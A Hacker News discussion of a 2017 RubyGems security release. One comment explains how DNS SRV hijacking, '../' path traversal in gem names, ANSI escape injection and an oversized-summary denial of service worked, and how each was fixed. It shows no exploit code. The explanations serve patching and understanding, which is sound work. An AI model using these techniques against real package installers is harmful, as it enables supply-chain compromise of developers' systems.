Hacker News new | past | comments | ask | show | jobs | submit login
Multiple vulnerabilities in RubyGems (ruby-lang.org)
189 points by omarish on Aug 29, 2017 | hide | past | favorite | 36 comments

>> "a vulnerability in the gem installer that allowed a malicious gem to overwrite arbitrary files"

Yeeks. Not good.

(sudo) gem update --system ASAP

I don't really get the fuss about this one. It's annoying and a vector, true, but keep in mind that even with this fixed, a malicious gem can overwrite arbitrary files. A gem can bring with it a C-extension. This extension is compiled with a makefile created by the gem-provided extconf.rb. AFAIK, the code in the extconf.rb is executed at gem install time, so arbitrary code can be executed at gem install time.

AFAICS this is the relevant line: https://github.com/rubygems/rubygems/blob/master/lib/rubygem...

Edit: Or, if you want to get a little more creative, have your gem include a plugin to rubygems itself, similar to what https://github.com/rvm/executable-hooks does.

I agree. Or how about one step away from just the installation? Once you load a gem it can do whatever the hell it wants to your system. This vulnerability feels very security-theater-ish. At the end of the day, someone needs to audit the gem or have deep trust in the supplying party (i.e. Rails) to protect against arbitrary file manipulation.

Installation and running are not necessarily done with the same account. Often, apps run with lower privileges than they're installed with, so the damage may be somewhat mitigated. I'd really treat that as a separate, albeit related problem.

While this is bad, most gems are executable code, which will get executed (seeing as you installed the gem).

So while this is bad, I don't think it's that bad -- a malicious gem could always mess you up. Still update!

The only difference is that you are perhaps more likely to install a gem system wide (which would require root rights normally) than run code from a locally installed gem with root rights.

I don't quite understand how this is different from the status quo? I guess gems may (sometimes) be installed with a different user (or even root) than the application server?

But even if: most systems today probably only run that one service, and the application server can rwx pretty much everything of interest because that's its job, right?

10 years or so ago you'd often see some company's server running apache as well as a mail server, the internal document repository and the financial systems. In that sort of setup, it's important to (try to) keep these systems isolated from each other. But today, all that root access would give you is the ability to read a few more Ubuntu man pages.

I wouldn't be so optimistic. There are often credentials to other systems (like databases, etc) on such servers, plus they now have access to the private network(s) the compromised server resides on. It gives the attacker the opportunity to serve exploits to users, to forward incoming requests from users to external servers (maybe there's an auth token or something they can use), and tons of other stuff.

Yep. Even if you only owned a perfectly sterile (no secrets) proxy tier to a distinct service tier, you are placed in the path of requests from clients to those services and can thereby extract credentials (passwords, tokens) or PII (names, emails), which would still be unacceptable.

> and the application server can rwx pretty much everything of interest because that's its job, right?

Eh, I don't know about that. I don't think most application servers are running as root, and I'm pretty sure it's considered bad practice to run them as root, no?

But yeah, they still need to have enough privs to do their jobs, which will be a lot of privs. But you still don't go from that to "might as well just run as root then".

Developer machines could be as interesting as servers, maybe more. If they can install a keylogger using a malicious or hijacked gem, then bingo!

The file overwrite and the ANSI sequence vulnerabilities are extra attack vectors. The main one has anyways been the code itself and its vetting process. This for Ruby gems and for any other open and closed source piece of code we run on our machines, starting from the processor(s) microcode.

would you have to go out of your way to find a malicious gem though? Its not like any of the popular gems would try to overwrite files, right?

There was recently a fiasco with NPM over a malicious node package whose name was an intentional typo of a popular package, and upon installation it exfiltrated all environment variables: https://twitter.com/o_cee/status/892306836199800836

After this got uncovered, Duo published a blog post where they scanned for and found several others malicious packages:


The last one they talk about worms itself by adding itself to any packages authored on the computer it's installed on.

These issues are not unique to npm.

Why go out of the way when you can just buy a popular one, this was a fairly mild version of that: https://forum.sublimetext.com/t/rfc-default-package-control-...

Granted that was just data collection, but the outcome could be incredibly worse if a combo of popular but bad code and a little bit of money.

Well an existing gem might not. But a gem you use has could have a developer's computer get compromised and could publish a malicious update. If you inadvertently download it while updating your gems you could get compromised.

The problem here is that you don't even have to get directly attacked to be affected.

Well it's a web of trust: typically people only trust their Gemfile, not their entire Gemfile.lock. If you audit the latter you should be fine (though of course you should upgrade regardless).

How much do you trust the code review process on every ruby gem?

I have a mirror of all Rubygems from last month. Should I scan em for PoCs?

Go for it, and report back!

If you can even figure out how to do such a scan, let us know!

What does PoC mean?

Proof of Concept (of exploit) ... Eg is it "in the wild" and being exploited.


Is the work on adding TUF to RubyGems still happening? I can only find this stagnant PR: https://github.com/rubygems/rubygems/pull/719

No work is happening in this direction on any known library server. They are waiting for (another) major hack to wake up.

Is there a more detailed description of the vulnerabilities somewhere?

The last 2 commits you listed are actually both for the arbitrary file write issue, and there was a 5th commit for the ANSI issue:


I went through all 4 issues and did a brief writeup for each of them. Only the first 2 issues are serious (and worth upgrading for). The last 2 issues are not really a big deal at all.

1) "a DNS request hijacking vulnerability"

Rubygems supports a gem server discovery mechanism, where if you set your gem source as 'https://example.com', the gem client will do a SRV dns lookup on "_rubygems._tcp.example.com" to determine where it should send requests to.

A MITM can intercept that dns request and return whatever server they want, forcing the gem client to download code from a malicious server.

Fixed by:


Now the returned DNS record must be for a subdomain of the gem source (in this case it must point to a subdomain of "example.com").

2) "a vulnerability in the gem installer that allowed a malicious gem to overwrite arbitrary files"

Gem contents could be unpacked in arbitrary file locations by setting the gem name to include file traversal characters like "../".

Fixed by:



Now gem names can only contain letters, numbers, underscore (_), dash (-), and dot (.).

3) "an ANSI escape sequence vulnerability"

Text specified in a gemspec can be output on installation or displayed when showing information about the gem. Gem authors can inject terminal escape sequences into (for instance) the authors field of the gem, and this will mess with end users' terminals.

Fixed by:


Now ANSI control characters are scrubbed out of text fields.

4) "a DoS vulernerability in the query command"

If someone provided an extremely large gem summary, rubygems would hang trying to process it.

Fixed by:


Now the summary is truncated to 100,000 characters. I'm a little surprised this was even triaged as a vulnerability.

I'm sure this has been brought up before, but I think HN should have a special tab where submissions like this get pinned--Important stores where people need to take action on stuff concerning security holes or political events (e.g. Net neutrality).

That doesn't make any sense to me.

People in such responsible positions are on respective announcement mailing lists anyway, and read about those events (and patch their system and/or take other measures) long before the story is upvoted on HN.

For example, every administrator of Debian systems is expected to be subscribed to the "debian-security-announce" mailing list.

Also, everyone who is interested or active in German net politics is subscribed to the "netzpolitik.org" RSS feed, or visits that site regularily.

Waiting until such a story hits HN and reyling on that seems highly dubious to be. As soon as any important story hits social media (such as Twitter, Reddit or HN), all important measures have already been finished. HN is really the end stage here, not the beginning. It is the reaction, not the initiative.

In short: Use the real network and connect directly to the relevant groups. Don't rely on aggregation networks.

(BTW, isn't is almost comical that the latter, rather than the former, are called "social" networks?)

I am not sure it has actually been announced on the relevant mailing list - https://groups.google.com/forum/#!forum/ruby-security-ann

You're right theoretically but I've seen numerous people on important FOSS and closed-source projects positions actually start addressing a problem after it has "gone viral" on HN.

Don't overestimate people; most devs and managers would look the other way if not much internet attention is given to their security issue. If they notice a report on HN they kind of panic and go in damage control mode, and then maybe actually fix the issue itself as well.

Being vocal on a popular and respected forum as HN is important for important issues to get much-needed attention.

Please note: I don't like that this is the truth but alas, I guess this is how Homo Sapiens works: it's not important if you know you screwed up; you can bullsh*t yourself to oblivion and delude your conscience but once many people know about your screw-up, then you suddenly care.

I think this is a great idea. Threads should stay on the main page, but also be pinned on a new tab, maybe called "Breaches", or something.

Given the hands-off approach, the PR concerns, and the fact that they have a healthy community of tech-minded people on here from which to recruit from, I find it unlikely that they would do anything perceived as too alienating to anyone.

There's been tons of suggestions about site improvements (much smaller ones, mind you) that have never gained any attention.

Such vulnerabolities would usually only impact a portion of users; and I hope these affected people have more reliable ways to keep up-to-date with vulnerabilities than HN...

Ruby, the gift that keeps on giving.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact